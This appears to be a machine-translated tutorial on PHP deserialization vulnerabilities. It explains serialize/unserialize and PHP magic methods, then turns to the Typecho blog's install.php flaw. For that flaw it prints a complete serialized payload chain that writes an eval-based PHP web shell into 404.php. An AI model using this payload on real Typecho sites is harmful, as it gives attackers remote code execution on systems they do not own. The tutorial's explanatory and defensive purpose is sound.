* serialize
* Converts an object to a string
* Deserialization
* Converts a string of a specific format to an object
What is a deserialization vulnerability
*
PHP The deserialization vulnerability is also known as PHP Object injection , It's a very common vulnerability , This type of vulnerability is difficult to exploit , But once used successfully, it will cause very dangerous consequences . The root cause of the vulnerability is that the program does not detect the user input deserialized string , The result is that the deserialization process can be controlled maliciously , This results in code execution ,getshell And a series of uncontrollable consequences . A deserialization vulnerability is not PHP specific , Also exist in Java,Python And so on , But its principle is basically the same .
* When creating a general program , Both destructors and constructors are overridden , Deserialization is the use of these rewritten functions .
Deserializing function
* php Two functions in :
* 1,serialize()
* 2,unserialize()
* 1,serialize()
* When in php After creating an object in , Can pass serialize() Turn this object into a string , Save the value of the object to facilitate the later transfer and use .
* 2,unserialize()
* And serialize()
Corresponding ,unserialize() Can be created from a stored representation PHP Value of , As far as the environment concerned this time is concerned , The object can be recovered from the serialized result (object
* example :
* $arr=array();
* $arr['name']=' Zhang San ';
* $arr['age']='22';
* $arr['sex']=' male ';
* $arr['phone']='123456789';
* $arr['address']=' Pudong New Area, Shanghai ';
* var_dump($arr);
* output :
* array(5) {
* ["name"]=> string(6) " Zhang San "
* ["age"]=> string(2) "22"
* ["sex"]=> string(3) " male "
* ["phone"]=> string(9) "123456789"
* ["address"]=> string(21) " Pudong New Area, Shanghai "
* }
* serialize :
* $info=serialize($arr);
* var_dump($info);
* output :
* string(140)
"a:5:{s:4:"name";s:6:" Zhang San ";s:3:"age";s:2:"22";s:3:"sex";s:3:" male ";s:5:"phone";s:9:"123456789";s:7:"address";s:21:" Pudong New Area, Shanghai ";}"
* a:5 Flag serialized as array contain 5 Key value pairs ,s:4 Flag content is string containing 4 Characters .
* $zhangsan=unserialize($info);
* var_dump($zhangsan);
* output :
* array(5) {
* ["name"]=> string(6) " Zhang San "
* ["age"]=> string(2) "22"
* ["sex"]=> string(3) " male "
* ["phone"]=> string(9) "123456789"
* ["address"]=> string(21) " Pudong New Area, Shanghai "
* }
Magic Methods
* Magic Function"
* yes php A class of special methods in the field of Mathematics
* __construct():
* When an object is created (new) Is called automatically when the . But in unserialize() Is not automatically called .( Constructors )
* __destruct():
* Called automatically when the object is destroyed .( Destructor )
* __wakeup():
* unserialize() Is called automatically when the .
* __wakeup()
* use unserialize Trigger when
* __sleep()
* use serialize Trigger when
* __destruct()
* Triggered when an object is destroyed
* __call()
* Triggering an invocable method in an object context
* __callStatic()
* Triggering an invocable method in a static context
* __get()
* Used to read data from inaccessible properties
* __set()
* Used to write data to an inaccessible property
* __isset()
* Called on an inaccessible property isset() or empty() trigger
* __unset()
* Use on inaccessible properties unset() Trigger when
* __toString()
* Triggered when a class is used as a string
* __invoke()
* Triggered when a script attempts to call an object as a function
Typecho Deserialization vulnerability
* Typecho:
* It's a simple one , Lightweight blog program . be based on PHP, Using multiple databases (Mysql,PostgreSQL,SQLite) Store data . stay GPL Version
2 Issued under license , Is an open source program , Currently used SVN To do version management .
* Typecho loophole :
* 1, Root site vulnerability ,install.php file .
* 2, Find the vulnerability location of the website , Used ‘unserialize’ Function to deserialize the received ‘__typecho_config’ parameter .
* 3, Trace to constructor according to source code and use .
* Typecho utilize
*
a:2:{s:7:"adapter";O:12:"Typecho_Feed":4:{s:19:"Typecho_Feed_type";s:8:"ATOM
1.0";s:22:"Typecho_Feed_charset";s:5:"UTF-8";s:19:"Typecho_Feed_lang";s:2:"zh";s:20:"Typecho_Feed_items";a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":2:{s:24:"Typecho_Request_params";a:1:{s:10:"screenName";s:57:"file_put_contents(’404.php',
'<?php
@eval($_POST[i]);?>')";}s:24:"Typecho_Request_filter";a:1:{i:0;s:6:"assert";}}}}}s:6:"prefix";s:7:"typecho";}
Repair and defense
* Like most vulnerabilities , The problem of deserialization is also caused by the control of user parameters , So a good preventive measure is not to put the user's input or controllable parameters directly into the deserialization operation .
Technology